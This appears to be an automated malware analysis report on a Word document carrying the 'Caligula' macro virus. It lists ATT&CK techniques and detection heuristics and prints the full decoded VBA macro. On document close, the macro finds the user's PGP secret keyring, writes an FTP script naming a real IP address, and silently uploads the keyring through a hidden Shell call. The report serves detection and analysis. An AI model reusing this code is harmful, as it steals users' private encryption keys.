MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1041 Exfiltration Over C2 Channel
The sample contains VBA macros with an AutoClose execution trigger, indicating it runs automatically when the document is closed. The script attempts to establish an FTP connection to '209.201.88.110' using anonymous credentials and uploads a file named 'secring.skr' to a remote location. This behavior suggests an attempt to exfiltrate sensitive data or download further malicious components.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-1501696 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1501696
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2082 bytes |
SHA-256: 0e97c74d84b74286126478b49d2564250797acb72ed55bc49589696a3c88a32d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Caligula"
Sub AutoClose()
'çŕđŕćĺíčĺ ďđč çŕęđűňčč äîęóěĺíňŕ
'...
'ďđîâĺđ˙ĺě ęëţ÷ áűë óęđŕäĺí ń ýňîé ěŕřčíű, ńĺëč íĺň ňî
čůĺě ęëţ÷
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup(ACME)\User Info", "Caligula") = False) Then pgppath = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PGP EncryptedFile\shell\open\command", "")
Position = InStr(1, pgppath, "pgpt")
'óçíŕĺě ăäĺ ęŕňîëîă(?) pgp
If Position <> 0 Then
pgppath = Mid(pgppath, 1, Position - 2)
Else
GoTo noPGP 'íŕ ýňîě ęîěďĺ íĺň pgp
End If
With Application.FileSearch
.FileName = "\Secring.skr"
.LookIn = pgppath
.SearchSubFolders = True
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
PGP_Sec_Key = .FoundFiles(1)
End With
'čůĺě íóćíűé íŕě ôŕéë
Randomize
For i = 1 To 4
NewSecRingFile = NewSecRingFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
NewSecRingFile = "./secring" & NewSecRingFile & ".skr"
Open "c:\cdbrk.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "binary"
Print #1, "put """ & PGP_Sec_Key & """ """ & NewSecRingFile & """"
Print #1, "quit"
Close #1
'îňęđîĺě č çŕďčřčě ďŕđŕěĺňđű îňńűëęč
Shell "command.com /c ftp.exe -n -s:c:\cdbrk.vxd", vbHide
'îňńűëŕĺě pgp ęëţ÷
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup(ACME)\User Info", "Caligula") = True
End If
noPGP:
'íĺň pgp
'ńîőđŕí˙ĺě â ŕęňčâíîě äîęóěĺíňĺ
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.